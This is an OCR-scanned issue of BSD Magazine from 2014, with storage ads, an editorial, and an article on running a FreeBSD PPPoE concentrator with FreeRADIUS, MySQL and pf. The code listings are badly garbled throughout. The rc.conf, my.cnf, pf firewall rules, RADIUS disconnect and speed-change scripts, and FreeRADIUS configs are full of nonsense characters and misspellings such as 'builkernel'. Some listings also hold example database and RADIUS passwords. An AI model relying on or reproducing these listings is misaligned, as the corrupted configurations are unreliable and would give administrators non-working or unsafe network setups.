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HOW IMPORTANT IS YOUR DATA? 


Years of family photos. Your entire music 
and movie collection. Office documents 
you've put hours of work into. Backups for 
every computer you own. We ask again, how 
important is your data? 


NOW IMAGINE LOSING IT ALL 


Losing one bit - that’s all it takes. One single bit, and 
your file is gone. 





The worst part? You won't know until you | 
absolutely need that file again. Example of one-bit corruption 





THE SOLUTION 


The Mini boasts these state-of-the- 


The FreeNAS Mini has emerged as the clear choice to 
art features: 


Save your digital life. No other NAS in its class offers 


i ry and ZFS bitr 
ECC (error correcting code) memory and ZFS bitrot sieseor Gotti Mora raecseor 


protection to ensure data always reaches disk . Up to 16TB of storage capacity 
without corruption and never degrades over time. - 16GB of ECC memory (with the option to upgrade 
to 32GB) 


, « 2x 1 Gigabit network controllers 
No other NAS combines the inherent data integrity : Ramotemanauementoore (EN) 


and security of the ZFS filesystem with fast on-disk - Tool-less design; hot swappable drive trays 
encryption. No other NAS provides comparable power ISSN re ictal emanecomngured 

and flexibility. The FreeNAS Mini is, hands-down, the 
best home and small office storage appliance you can 
buy on the market. When it comes to saving your 
important data, there simply is no other solution. 
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CERTIFIED 
STORAGE 


With over six million downloads, 
FreeNAS is undisputedly the most 
popular storage operating system 
in the world. 


Sure, you could build your own FreeNAS system: 
research every hardware option, order all the 

parts, wait for everything to ship and arrive, vent at 
customer service because it hasn't, and finally build it 
yourself while hoping everything fits - only to install 
the software and discover that the system you spent 
days agonizing over isn’t even compatible. Or... 


MAKE IT EASY ON YOURSELF 


As the sponsors and lead developers of the FreeNAS 
project, ixsystems has combined over 20 years of 
hardware experience with our FreeNAS expertise to 
bring you FreeNAS Certified Storage. We make it 
easy to enjoy all the benefits of FreeNAS without 
the headache of building, setting up, configuring, 
and supporting it yourself. As one of the leaders in 
the storage industry, you know that you're getting the 
best combination of hardware designed for optimal 
performance with FreeNAS. 


Every FreeNAS server we ship is... 


» Custom built and optimized for your use case 

» Installed, configured, tested, and guaranteed to work out 
of the box 

» Supported by the Silicon Valley team that designed and 
built it 

» Backed by a 3 years parts and labor limited warranty 





As one of the leaders in the storage industry, you 
know that you're getting the best combination 

of hardware designed for optimal performance 

with FreeNAS. Contact us today for a FREE Risk 
Elimination Consultation with one of our FreeNAS 
experts. Remember, every purchase directly supports 
the FreeNAS project so we can continue adding 
features and improvements to the software for years 
to come. And really - why would you buy a FreeNAS 
server from anyone else? 





FreeNAS 1U 

- Intel® Xeon® Processor E3-1200v2 Family 

« Up to 16TB of storage capacity 

* 16GB ECC memory (upgradable to 32GB) 

« 2x 10/100/1000 Gigabit Ethernet controllers 
« Redundant power supply 


FreeNAS 2U 
- 2x Intel® Xeon® Processors E5-2600v2 Family 
« Up to 48TB of storage capacity 
¢ 32GB ECC memory (upgradable to 128GB) 
« 4x 1GbE Network interface (Onboard) - 
(Upgradable to 2 x 10 Gigabit Interface) 
« Redundant Power Supply 











http://www.iXsystems.com/storage/freenas-certified-storage/ 
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EDITOR’S WORD 


Hello BSD users, 


e, the BSD Mag team, are releasing the new BSD 
issue. This issue includes the next articles that will 
upgrade your admin skills. We hope that you will find 
the articles useful. Our ultimate goal is to provide you with the 
knowledge and skills you need in your professional careers. 
First, | would like to mention that we are publishing the last part 
of the Unix+ Command article and now you have all that you need 
to secure your systems and to check what parts are unsecure. 
If you need your own centralized server you must read Tiago’s 
article and see how to make it step by step. For the weekend, we 
will recommend to start playing with 3D objects. Rob will show you 
what you can do and how to use Gimp to create your own images. 
| am looking for the next topics for 2015. I'd love to receive your 
suggestions regarding what articles should be in the next issues 
of BSD. If you think we’ve missed a very interesting subject that 
Should be covered, do not hesitate to write to us. 
| would like to present more and more Unix-oriented projects so 
feel free to send your suggestions. 
As always, we would like to send a warm “Thank You”. 
If you want to go on a real life, open source journey with our rich 
content workshops, publications, tutorials, and so on or if you want 
to get in touch with our team, please email us. 


Enjoy reading, 
Ewa & the BSD Mag Team 


BSD 


MAGAZINE 





MAGAZINE 


Editor in Chief: 
Ewa Dudzic 
ewa.dudzic@software.com.pl 


Contributing: 

Michael Shirk, Andrey Vedikhin, Petr Topiarz, 
Charles Rapenne, Anton Borisov, Jeroen van Nieuwenhuizen, 
José B. Alds, Luke Marsden, Salih Khan, 
Arkadiusz Majewski, BEng, Toki Winter, Wesley Mouedine 
Assaby, Rob Somerville 


Top Betatesters & Proofreaders: 
Annie Zhang, Denise Ebery, Eric Geissinger, Luca 
Ferrari, Imad Soltani, Olaoluwa Omokanwaye, Radjis 
Mahangoe, Mani Kanth, Ben Milman, Mark VonFange 


Special Thanks: 
Annie Zhang 
Denise Ebery 


Art Director: 
lreneusz Pogroszewski 


DTP: 
lreneusz Pogroszewski 
ireneusz.pogroszewski@software.com.p! 


Senior Consultant/Publisher: 
Pawet Marciniak 
pawe!@software.com.pl! 


CEO: 
Ewa Dudzic 
ewa.dudzic@software.com.pl 


Publisher: 
Hakin9 Media SK 
02-676 Warsaw, Poland 
Postepu 17D 
Poland 
worldwide publishing 
editors@bsdmag.org 
www.bsdmag.org 


Hakin9 Media SK is looking for partners from all over the 
world. If you are interested in cooperation with us, please 
contact us via e-mail: editors@bsdmag.org. 


All trademarks presented in the magazine were used 
only for informative purposes. All rights to trademarks 
presented in the magazine are reserved by the 
companies which own them. 


11/2014 











IN BUSINESS 


FreeNAS 
in an Enterprise Environment 


By the time you're reading this, FreeNAS has been downloaded 

more than 5.5 million times. For home users, it’s become an 

indispensable part of their daily lives, akin to the DVR. uk 
Meanwhile, all over the world, thousands of businesses i SYS tems 






universities, and government departments use FreeNAS to \ \ | 
build effective storage solutions in myriad applications / ie 


What you will learn. LA 


« How TrueNAS builds off the strong points of the FreeBSD and | 


i Ba ULE MDa a Le 


* How TrueNAs meets modern storage challenges for entery 
THE PEOPLE WHO DEVELOP FREENAS, THE WORLD'S MOST 
T he FreeNAS operating systems is fre POPULAR STORAGE OS, HAVE JUST REVAMPED TRUENAS. 


the public and offers thorough doc 
active community, and a feature-rig 
the storage environment. Based on Free 
can share over a host of protocols (SM§ 
FTP, iSCSI, etc) and features an intuiti 
the ZFS file system, a plug-in system 
much more. 
Despite the massive popularity g 
aren't aware of its big brother dut 
data in some of the most demand 
environments: the proven, enterp 
professionally-supported line of 
But what makes TrueNAS diffd 2 . 1 
Well, I'm glad you asked... ve ee 





Commercial Grade Supp 
When a mission critical stor 


organization's whole operat POWER WITHOUT CONTROL MEANS NOTHING. 
fee katana TRUENAS STORAGE GIVES YOU BOTH. 
and running in a timely 
responsiveness and expe 
spree [Vi Simple Management WM Self-Healing Filesystem 
Created by the sa (Vj Hybrid Flash Acceleration ( High Availability 
developed FreeNAS. ) 
Ciralienaeeleiesien (Vie Qualified for VMware and 
CAB aeriticcca arene (ve HyperV 
Up Front (no hidden CAI Works Great With Citrix 
licensing fees) XenServer® 


To learn more, visit: www.iXsystems.com/truenas 


Ae BY otis Lae Lieataaneeie 

t=] Meee) eee en em eed SE Stee Ren eee eee ee 
VMware and Viviware Read) a Fegistered trademarks or trademarks of VMware, linc. in the United States and other jurisdictions. 
Citrix makes and you receive no representations on warranties of any kind with respect te the third party products, its functionality, the test(s) or the results 
i ee i nh rexpressed, Iimplled, statutery or ee ae ncluding without limite ati HiRes eee ee sia ee eee | sla Leslee i 
tsk aoe aia Lia Coe dS a nitted ey applicable mas ie | ee rome aes ART Shs LS | bay id id whatsoever seer 1 8 
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CONTENTS 


Tiago Felipe Goncalves 

Tiago, in his article, presents how to use a PPPoE Concentrator Dual-Stack (v4/v6) based on 
open source software for small and midsize Internet service providers. He will also describe how 
to make a FreeRadius centralized server and will cover its settings, once they are essential for 
the concentrator’s operation. 


Rob Somerville 
The next part of our Gimp series will be about 3D objects. In this article, Rob will give you more 
information about how to create a realistic 3D object for a FreeBSD carton that is print ready. 


Craig S. Wright 

The last part of Craig’s article will give you insight into Pen Testing and Audits. Craig will present 
the Netcat tool. Netcat has a number of pre-existing scripts that can allow it to act as a simple 
vulnerability scanner. It does this by connecting to the port to be tested, entering data to test a 
vulnerability and returning the result. 


Michael Ortega 

Application Security testing tools are often the best solution for security professionals tasked with 
securing applications throughout the Software Development Lifecycle (SDLC). This is where we 
introduce Acunetix! As a precursor to the remainder of this article, Michael has had the opportunity 
to work with a number of Application Security tools for large enterprises. 


Rob Somerville 











Performance and 
Reliability is critical 
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Download syslog-ng Premium Edition 
product evaluation here 


Attend to a free logging tech webinar here 


BalaBit 


IT Security 


www.balabit.com Te 





syslog-ng log server 


The world's first High-Speed Reliable Logging™ technology 


HIGH-SPEED RELIABLE LOGGING 


m above 500 000 messages per second 





=m zero message loss due to the 
Reliable Log Transfer Protocol™ 


= trusted log transfer and storage 





= 


The High-Speed Reli 





Dual-Stack! 


The case below is about how to ride a PPPoE 
Concentrator Dual-Stack (v4/v6) based on open 
source software for small and midsize internet service N( 
providers. We will also describe how to make a 
FreeRadius centralized server (talk quickly because the 
focus is the concentrator) and will cover its settings, 


PPPoE Concentrator 


— fs LENA LAAN 


once they are essential for the concentrator’s operation. 


LEASE #15, using mpd5, pf (containing a set of 

firewall rules for administration with the support, 
sysadmin, infrastructure, blocked users to redirect to an 
information block page, customers behind nat44 — I’m 
not adept, but with the lack of IPv4 addresses that is in- 
evitable nowadays, normalization of packages and some 
security filters), recursive dns, snmp for data collection, 
quagga running zebra, ospf, ospf6 for redistribution, web 
interface system for reading authentication logs, web in- 
terface to support customers and addressing public or pri- 
vate (nat44), fixed or dynamic ips pool system. 


7 he concentrator is based on FreeBSD 10.0-RE- 


processes in the run queue 


Fri 12:00 


o — 
Fri 66: 00 


From 2014/11/21 64:47:27 To 2014/11/22 05:11:54 


Figure 1. Server load average on the results 


" BSD 


Load Average 





Hardware: buy hardware according to your needs. If you 
do not understand your needs very well, there is no magic 
to solve your problems. The FreeRadius server needs fast 
disks, preferably SAS and a safe array to the data raid10 
fits well and large memory, as it can optimize mysql and 
a good NIC. | believe that nowadays 32GB is accessible 
to everyone. 

The PPPoE concentrator is a case of great myths, but 
what really matters is that the higher the frequency, the 
better your income and if combined with appropriate NICs, 
many cores are essential to the concentrator’s operation. 
HD and memory, anything goes, I’m using 2x Intel (R) 


Fri 18:00 Sat O00: 00 
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Xeon (R) CPU E5506 @ 2.13GHz (this processor is not 
appropriate because of the low frequency, but it was what 
| had at the time) and two network adapters Intel 1350-14. 

Results: ~3500 PPPoE clients, ~450Mbps and 100Kpps. 

Mathematical estimate that we could reach with this 
server: ~7000 customers and/or ~900mbps. 

Just as a remainder, we have more options. | used sev- 
eral concentrators redistributed through ospf and several 
Freeradius server redundancies through carp and mysal, 
doing master-master redundancy and this is not a rule, it 
depends on your infrastructure. And if you need better re- 
sults, invest in 6 or 8 cores and NICs Intel X540 or X520. 

Tests were performed with firewalls controlling band- 
width, ipfw through dummynet and pf using altg with sev- 
eral dynamic anchors due to the unique sense of control 
provided to altq. The results obtained with pf were better 
than the results obtained with ipfw, but with pf the admin- 
istration can get very confusing and not scalable when the 
number of customers increases. 

Other tests were performed with control ng bpf and 
ng_car, and in these cases, the results obtained in perfor- 
mance and scalability were amazing! 

| thank the community that continues to contribute to open 
source as the main reason for this publication is “knowl- 
edge must be open”! | would like to cite all references and 
ideas that many searches showed me, but nothing com- 
pares to the FreeBSD Developers Handbook and a blog 
that always has valuable information: httos://calomel.org/— 


Streams 


Hew Screen 


Figure 2. Simple topology to implementecdo hub 
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it's well worth reading because it helped me a lot and helps 
in my day to day with BSD and networks. In particular, | 
thank the collaboration with my best friend Marcos Buzo, 
helped me a lot along the way and is always beneficial 
(Listing 1). 

Let's start with FreeRadius! 

This is the configuration of a simple and valid functional 
server. Put up some files that were not needed; only if 
they have questions to have as a reference, it has the fol- 
lowing necessary settings. Edit rc.conf with some settings 
and startup daemons (Listing 2). 

Compile a new kernel: 


cd /usr/src/sys/amd64/conf/ 

mkdir -p /root/kernels/ 

cp GENERIC /root/kernels/yggdrasil 
ln -s /root/kernel/yggdrasil . 


Se HE OSE HEHE 


cd /usr/sre 


Add these lines to the kernel: 


# vi /root/kernels/yggdrasil 
device pf 
device pflog 


device pfsync 


# make builkernel KERNCONF=yggdrasil 
# make installkernel KERNCONF=yggdrasil 





Wr 
U 








Listing 1. 


The mentioned address blocks are reserved for documentation - RFC 5737. 


The block 203.0.113.0/24 (TEST-NET-3) will represent public and routable addresses. 
The block 198.51.100.0/24 (TEST-NET-2) will represent private addresses for communication with the Radius (yggdra- 


Sil.connectionlost.com.br) server. 


The block 192.0.2.0/24 (TEST-NET-1) will represent private addresses for nat use with customers (I am against it, 


but unfortunately in a few cases we do have to use it). 


The mentioned IPv6 address prefix 1s reserved for documentation - RFC 3849. 


I am using an alias block 198.51.100.0/24 in the interface, but this flow could be segregated in a vlan or interface 


for security purposes. 


Addresses configuration: 


Gateway: 203.0.113.1 


Radius? 

HOS VOCCt@act Pconneculenlogu.comuor 
Evie mes 20350. Ise 2/24 

Raciicm iP . lOG SS Wot 27 24 


Coneeneiawonr. 

loses yeulloveililelcleminecieseillorie eons leue 
Public r=) 203 035/24 

Pubikie gtr 76.0 20 Oleding 357 32 

Radtic Wrst Oe ss ie 1005724 

Private, De: 192.022 5/24 

Hadise LomaleloogbackeLe. 9? thos. InOIOR IF 32 


SVcacmuneee 70s Jeni sao ey 74 
Sysadmin IPv6: 2001:db8::cafe/32 


iMitrastruictumeoscuy UPS 203.0 1s 10/24 


MOMiPOmingucohyet lls = 203 JVs sik)/ 24 
Monitoring server 1Pyo: 2001 ;dbe; : 10/32 


Welbesemvei: 00 Oe iiboe Idk) 24 
Websseryveruleyo: 200M = dees. 1l/ 32 


Listing 2. 
TeCabem Cee, bee comer 


hostname="valhalla.connectionlost.com.br” 


PECOnNG TOGO = Inet aZU SU. Mie a2 Nebiasie ZO osc once” 





TEconngvgb0talras0= inet 19e7ol2 10022 netmask 
DOS Oo coo Ue 


defaultrouter="203.0.113.1” 
gateway enable="YES” 


pf enable="YES” 


wi 


pf flags= 








Dr CULes="9/ el) ph come 





pflog enable="YES” 


ana 


pflog flags= 
pilog logfile="/var/log/pflog” 


mysql enable="YES” 

Myc clears = a aelay— loo —imycel as laveauela yet hoe 
name-resolve” 

sshd_enable=yes 


nactusdpenaele— ii” 


Esck sy enabile="YEhS” 





mtpd enable="YES™ 





postfix enable="YES” 

sendmail enable="NO” 

sendmail submit enable="NO” 

sendmail outbound enable="NO” 
sendmail msp queue enable="NO” 

daily clean hioststakbvenaole= NO” 
daiinjestauls Maite begechs senable=— NO 
daalyestavus incelude submit marig= NO” 


daily submit _queuerun="NO” 


#eof 
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Listing 3. 

fovea / Us, local) ete/my. cut 
[client] 

[mysqld] 

Pome = 3306 


ski p= lockiing 

key buffer = 256M 

max allowed packet = 4M 
Sole JUNE eie Sie UM 
Bead Vouienok eS Ac = aly) 
GeaC wane OUbnem si Zee—. 21) 
My tSa sO nD On rem es uZe — 53 2) 
tiveadmeachens  sze n= 10 
query cache size= 8M 
tipead concurrency = 4 
max connections = 500 
Bineadmeadchens tae — 0 
query cache ysize — 173M 


i 


Guewy SeAecnemey eS 
query cache limit = 1M 
JOLUy OUR TeE ysl 7e5— 250k 
EMP peavletsuze = 32) 
Maxneap, table vsize = 32) 
Key Dumskemsemsae = 9504) 
tpabllevcache = 128 


# 7 very important lines 

LUMO oie pew stake 

innodb flush method=0 DIRECT 
immedb: log Tile si ze=1G 

innodb buffer pool size=4G 

log = /var/log/mysqld.log 

log_ slow queries = /var/log/mysqlid.slow.log 





log-error = /var/log/mysgld.error.log 


long query time=2 

datadir = /store/db/mysql 
Siete loe Eng 

log-bin=mysgql-bin 


server-id = 2 


innodb data home dir = /store/db/mysql/ 


EiMede youn tes eoo size) — 1 Z)) 

innodb additional mem pool size = 64M 
innodb log file size = 128M 
innodb log buffer size = 64M 





immodb tush Mog jar trx comic = 2 





uInodb daa Wie pavin = vodairal 00M: auikoexkend 


innodb lock wait timeout = 500 


[mysqldump] 
qumel 
max allowed packet = 24M 


[mysql] 


no-auto-rehash 


[isamchk] 

key buffer = 384M 

SOGE  Ouimiciw ewze = be 
beac you mrem == 71! 

write buffer = 2M 


[myisamchk] 

key buffer = 64M 

SOGr  OUmmmetay ewes — aol 
peac OuUnher —— 7) 

Wetce bueter = 2M 


[mysqlhotcopy] 


interactive-timeout 

#teof 

Let’s create the log files: 
touch) / vary log/mysecld. log 
touch /var/log/mysgqld.slow.log 


Eouch / var, ieg/myscilid -enruor, log 


i 

it 

if 

# Chown mysgl:mysql /var/log/mysgqld.log 

# chown mysgl:mysql /var/log/mysqld.slow.log 
it 


chown mysgl:mysql /var/log/mysgld.error.log 
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Listing 4. 


? Cav /ete/pr. cont 
#if ext 
ext_if = “igb0” 


Ti 


i) 


Sx pe = Worm) alles 





SEs Ton teercliabhs), Lhe Psy OGNR Ae 


#tables 
tawlee—Ssimawlise= spe gers 


# private ips tables, be careful to not block yourself 





Nene aS ys lO Oey Crea Oey Gp dno 0Uy LZ, 
OOOO eee Are One Ze AP OOO eNO. Or, 
ZOO OOO A Ae Dee oy Os 

Ssh lextpene = 2220" 


ser bilock—policy drop 


See Ogi meewireee Sec 1 ir 





set fingerprints “/etc/pf.os 


set skip on 1o0 


scrub in all fragment reassemble max-mss 1460 


scrub out random-id max-mss 1460 


lock in log quick proto tcp flags FUP/WEUAPRSF 


lock in log quick proto tcp flags WEUAPRSF/WEUAPRSF 
lock in log quick proto tcp flags SRAFU/WEUAPRSF 
lock in log quick proto tcp flags /WEUAPRSF 


Lock ino neirek ao rOlourepeilags =ok/om 





oer oO Oo Oo Go © 














OO eee ©) eS a © eS 


lock invlog quick puerto rep dlags 5r/ on 


block in quick from urpf-failed 


# try to block nmap scans 
block an Nog, quiclon Sexes ner prore ECD Erom any ico 


any flags FUP/FUP 


# block RFC 1918 addresses 

blechdcoo an log ata l) Rcuvel one Sears rome. Materantc 
Om aie 

bilteekidinep tnliog (alll) Squich ons cx rete rodius From 
Smartians to any 

bi@ckrdreprouleslog mall) cite Von scx ae Eromramny| Fo 
Smartians 

RO Chercise Om Ouiive he cente Isl) Mic thte Rontre uy hom acicstle mt LOM 


any to Smartians 


+ Ssh abuse 


block in log quick from <ssh_abuse> 


block log all 


# release and mark output 


pass out keep state 


ale 


pass guick on lo0 all 


# icmp type 8 

Pass 20 ON) eu eeu Prore Teme trom (703. 0.1365} 
I) MSc iO ake ycS 

Pass 20 0) ~cxu Ji aimee Proro vem trom (203.0) ilo 05} 
POM > Gee Mpa caC hl Ce mele aly on © 


# ospf 
pass proto ospf from 203.0.113.0/24 to any 


# allow out the default range for traceroute (8): 

# “basetnhops*nqueries-1” (33434+64*3-1) 

Pass Clie Om (exes tne eepLOLO Uap Tromichy ou dny pore 
33433 >< 33626 keep state 

Pass Olle On Sexy Ji 3c ines prove udp from any eo any 


port 33433 >< 33626 keep state 


# monitoring 
pass cuUlckyprore (eco, ude, Erom 20o- Ue lls] 0h onan, 
keep state 


# sql/radius 
Pass on o-xerr prece uc udp} £rom 1193 515 1005) iro 


2 Geerhe eclo tome. omo mae 


# ssh 

Pass in log) on sexu 15 prouo tcp Erom any vo Sex 1p 
port Sssh_extport flags S/SA keep state (max-src-conn 
10, max-src-conn-rate 3/5, overload <ssh_abuse> flush) 

Pass th KoCuonee ehh pO OmuCo Frome ymicoms crm 
ip radius port $ssh_extport flags S/SA keep state 
(max-src-conn 10, max-src-conn-rate 3/5, overload 


<ssipabuse> ilusii) 


OUE 
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Listing 5. 


jv GOOt) SCELPUS, POdNdGOp si 
oy palm) ein 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


Ee eo |] 

then 
echo “Usage: $0 {customer}” 
exit 1 


fi 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 


localhost “edie —pseniaraciuc) —s Nie 


c drop=*$radius”SELECT Username, AcctSessionId, NASIPAd- 
dress FROM radacct WHERE username=’$1’ AND acctstop- 
Lame “us NUD ORDER BY accistearkbime DESC amit: 17” 


Usermeame= ) (chor cecroon | yaw  (priieea i), ) 


Sessvon=—- (Cche sc drop |awks {print 72) ) 


Mas=—(echo Sc drop | awk “{prine 55) ) 


Ife enas. lar | 

then 
echo “Acct-Session-Id=Ssession, User- 
Name=Susername, NAS-IP-Address=Snas” | radclient -x 
9nas:3799 disconnect mudar_ senha 


fi 


#teof 


Listing 6. 

#vi coa change.sh 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


1G ules cere oi 
then 
echo “Usage: $0 {customer} {down speed in kbyte} 
{up speed in kbyte}” 
exit 1 
else 
PE esp oe | 
then 


echo “Usage: $0 {customer} {down speed 


in kbyte} {up speed in kbyte}” 
exit 1 
else 
ela | 
then 
echo “Usage: $0 {customer} {down 
speed in kbyte} {up speed in kbyte}” 
exit 1 
fi 
ci 
fi 


radius="/usr/local/bin/mysgl -u radius -u userradius -h 
hoceinos t= -<acdsus: =psenkaradius =o Nl Se” 

Cc coa= Sradius”SELECT Username, AcctSessionId, NASIPAd- 
dress FROM radacct WHERE username=’$1’ AND acctstop- 
time: is NUM CORDER BY caceLstartrtime DECC damit ie’ * 

Usermame=s (Scho Sc Coa | awk {prince 31} ) 

session=$(echo $c_coa | awk ‘{print $2}’) 


Mas=> (echo 26 60a | awk. {prime 33)" ) 


vdown=$ (echo $2”000”) 


VEOWMeN = Clem cowl Ohl oles: | woe | Cle sce. oth) 
VdOWneecb==- (echo 2 -vdownemou | Oe | "eure —cl 7 nl) 
vup=s (echo $3”000”) 

vuUpenb= ) (echor vp 0.4757 1S | ibe | cue sd) 5 Si) 

VU Sls echic) \ 2 Swvbls Vale: || Isic ||) ete el isi) 


echo User-Name=Susername,mpd-limit += \”in#l=all rate- 
limit $vup $vup_nb $vup_eb\”,mpd-limit += \”out#l=all 
rate-limit Svdown $vdown_nb $vdown_eb\” | radclient 


“< Sides si) ee! Coe) witiecleie seal! 


#teof 
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We will install the necessary packages: Install mysql- 
server on your Freebsd: 


# cd /usr/ports/databases/mysql51-server/ 


# make install clean 
Install freeradius: 


# cd /usr/ports/net/freeradius2/ 


# make install clean 


Remember to enable mysq| in radius. 

This is an example file for mysql, feel free to change: 
Listing 3. 

| will post on my blog a perl script that helps make a tun- 
ing in mysql]; it’s not the case with that server because the 
hardware is well below expectations. 

Check it out when you can: www.connectionlost.com.br. 

Let's climb a firewall (can vary greatly depending on 
your infrastructure), as this is an important point of our in- 
frastructure: Listing 4. 

Now let's go over some scripts needed to make every- 
thing work. 

This script is used to generate pod packets or Packet of 
Disconnect (disconnect users): Listing 5. 

Permissions to be executable: 


# chmod +x /root/scripts/pod drop.sh 
This script is used to generate coa packets or Change 


of Authorization (in this case, the script is to change the 
speed of the client without dropping it): Listing 6. 


Permissions to be executable: 
# chmod +x /root/scripts/coa_change.sh 


This script will help you if you have many clients with 
Multiple logins. For large quantities, it can disrupt the 
functioning of your concentrator but does away with wor- 
ries in the issue of simultaneous logins and the FreeRa- 
dius problems (Listing 7). Permissions to be executable: 


# chmod +x /root/scripts/mpp.sh 
To run it put in your cron or use screen. 
# screen -dmS mpp /root/scripts/mpp.sh 


lf you have a backup script or something that can gener- 
ate a big lock on your database, remember to stop this 
script and start it after execution. Now let’s configure 
FreeRadius: Listing 8. Now we need to create a base in 
mysql for FreeRadius. This is the required schema: List- 
ing 9. Create the base: 


# mysql -u root -p 
# create database radius; 
# grant all privileges on radius.* to 
‘userradius’@’ localhost’ identified by ‘senharadius’ ; 
# grant all privileges on radius.* to 


‘userradius’ @’198.51.100.5’ identified by ‘senharadius’ ; 


Give access to the key that we will create on the concen- 
trator, so that the web cgi works properly: Listing 10. 


Sat Nov 22 07:40:00 2014 Packets/s any protocol 


90 k 


BO k 


FO k 


60 k 


50 k 


40 k 


30 k 


Packets/s any protocol 


20 k - 


18 k 





Fri 12: 06 


all: 86.2 k/s top: 69.3 k/s udp: 


Figure 3. NetFlow data — packets on the results 
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Listing 7. 


# cat mpp.sh 
7 ly palm sin 
#written by tfgoncalves (at) connectionlost (dot) com(dot)br 


#1414503716 


radnus="/usr/ local bin/mysgql =U radius —u root —h, lodcal- 


host radius -psenharadius -s -N -e” 


#C COa= Sradius SELECT Username, AcctSessionid, NASIPAd- 
dress FROM radacct WHERE username='’$1’ AND acctstop- 
time Ls NUL ORDER BY accistartiime DESC Limit 1% 

tail -f /var/log/radius.log | while read line 

do 
mpp=$ (echo Sline | grep MPP | awk ‘{print $14}’ | sed 
Mey Se lee Sede S72 hoy 7) 
if [ “Smpp” != "J 
then 

Sradius”update radacct set acctstoptime=now () 
where acctstoptime is null and username=’ Smpp’ ;” 
echo “MPP clicént — “~Ssmpop” .” 
ii 


done 


#eof 


Listing 8. 
# vi /usr/local/etc/raddb/clients.conf 
Clrene localnost { 
ipadde = 1272.0.0.1 
secret = testingl23 
BequaverMeesage salunenenecavou — ne 
shortname = localhost 


nastype = other 


client. 19S 25121002 5 ={ 


shortname = valhalla 
secret = senhaclienteradius 
nastype = other 

} 

#eof 


# vi /usr/local/etc/raddb/dictionary 
SINCLUDE /usr/local/share/freeradius/dictionary 
SINCLUDE /usr/local/share/freeradius/dictionary.mpd 





#eof 


# vi /usr/local/share/freeradius/dictionary.mpd 
# 
# dictionary.mpd 














VENDOR mpd Zsa 
BEGIN-VENDOR mpd 

ATTRIBUTE mpd-rule i Siena tal 
ATTRIBUTE mpd-pipe y Sie ea 
ATTRIBUTE mpd-queue 3 SacranntaG 
ATTRIBUTE mpd-table 4 Se iasiatal 
ATTRIBUTE MOCd= malo lke circu 5 Sata 
ATTRIBUTE mpd-filter 6 fs Cie siete; 
ATTRIBUTE mpd-limit 7 Sering 
ATTRIBUTE mpd-input-octets 8 Siena ac 
ATTRIBUTE mpd-input-packets 9 Sue esta 
ATTRIBUTE mpd-output-octets 10 Giee ane 
ATTRIBUTE mpd-output-packets 11 iS Clea icyey 
ATTRIBUTE mpd-link iy Steaita | 
ATTRIBUTE mpd-bundle IS Sie eat 
ATTRIBUTE mpd-iface 14 eianiatal 
ATTRIBUTE mpd-iface-index ile integer 
ATTRIBUTE NO Cael ele icleeie als Svea eta 
ATTRIBUTE MOC Oils OUlemae ei ae Sreraninta 
ATTRIBUTE iio elma leaker aes Se leniataie 
ATTRIBUTE mpd-peer-ident 1 Sia 
ATTRIBUTE mpd-iface-name 20 Sie i ag 
ATTRIBUTE mpd-iface-descr Zl Sue esata 
ATTRIBUTE Mie Gwe lies =O a@lip Le Sues ac 
ATTRIBUTE mpd-drop-user 154 integer 
END-VENDOR mpd 

#eof 


# Vile / ust) Vocal/erc/ raddb/ raditisd..cont 
prefix = /usr/local 

exec prefix = ${prefix} 

sysconfdir = S{prefix}/etc 
localstatedir = /var 

sbindir = ${exec_ prefix}/sbin 

logdir = /var/log 

raddbdir = ${sysconfdir}/raddb 
radacctdir = ${logdir}/radacct 


name = radiusd 





www.bsdmag.org 


BSD 


MAGAZINE 











confdir = ${raddbdir} 

run dir = ${localstatedir}/run/${name} 
db dir = ${raddbdir} 

libdir = fusr/local/lib/freeradius-2.2.4 


pidfile = ${run_dir}/${name}.pid 


user = freeradius 


group = freeradius 


max request time = 30 


cleanup delay = 5 


max requests = 12800 


listen { 


type = auth acct proxy detail status coa 


ipa ceiq = Oso lOO 2 


port = 0 
} 
listen { 
Hpac = Jo, oe O02 
port = 0 
pVCen= sac Clr 
} 
hostname lookups = no 
allow _core dumps = no 


regular expressions = yes 


expcndedwexprese Lone = yes 


log { 
destination = files 
file = ${logdir}/radius.log 
syslog facility = daemon 
stripped names = no 
auth = yes 
auth badpass = yes 


auth goodpass = no 


checkrad = S{sbindir}/checkrad 


security { 
Max altri tubes: =) 21010 
neyecurcdelay — a1 


Status server = yes 


proxy requests = yes 


SINCTUDE Orexy.cons 


SNC GUD ee liveiines.e om: 


thread pool { 


Stace Sevres Si 


Max Servers =) 32 


3 


Neh eS Paseo TS claves 
max Spare servers = 10 


Mer amia= 6/ll mcm lame an (ane) 


modules { 
SINCLUDE ${confdir}/modules/ 
SINCLUDE eap.conf 
SINCTRUDE sql cont 
SINCLUDE sqlappcol cont 


instantiate { 
exec 
expr 
expiration 
logintime 
} 
SINCLUDE polvey come 


SINCLUDE sites-enabled/ 


#teof 


# vi /usr/local/etc/raddb/sqlippool.conf 
Sqlippool { 

sql-instance-name = “sql” 

ippoolyvable = Yradippool” 
lease-duration = 360 

pool-key = “~<c{NAS—Port)” 

SINCLUDE sql/mysql/ippool.conf 
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Sqleeoolploggexteter— erst tig le eaueeol yy amamees lp 
Address} \ 
(dace o | Calbled=Statron— id} cle Cahiing=staston— 6} 


port %{NAS-Port} user %{User-Name}) ” 


sqlippool log isuccess = Allocated IF: oireply:Framed— 
IP-Address} from %S{control:Pool-Name} \ 
(dideo Callled=Starion-ld, relim./Callimng=statvon— ids 
port s{NAS-Port} user %{User-Name}) ” 

sqlippool log elean = feleased IP 9. Framec—iP— 
Address} \ 

(dito Cakbled=Stattonamd;siclin 4 Cell linc= Sita tonal) 


° 


user %{User-Name}) ” 
sqlippooll log fayled = “iP Allocation FAILED: trom 
S{control:Pool-Name} \ 


(dnt ahhked=Sbamton—- ld) welt, (Coming = inet Omelds 


port s{NAS-Port} user %{User-Name}) ” 


sqlippool_ log nopool = “No Pool-Name defined \ 
(diy oy Called=sbanton=ia) ela -o Calling=statlon= kay 


° 


port %{NAS-Port} user %{User-Name}) ” 


#eof 


¢ Vio Us, locally ete/ raddb, sql. com 


Saat 
database = “mysql” 
driver = “rim sql $S{database}” 
Ssemvem —— Nocali@st 
login = “userradius” 
password = “senharadius” 
Radius db y= . cad nis 
acer jeablel =  “radaccr” 
accu meablieZ == “radacer 


postauth table = “radpostauth” 
eUUNENCe tables racenes ke 
eutnnepbystable =" radzep ly” 
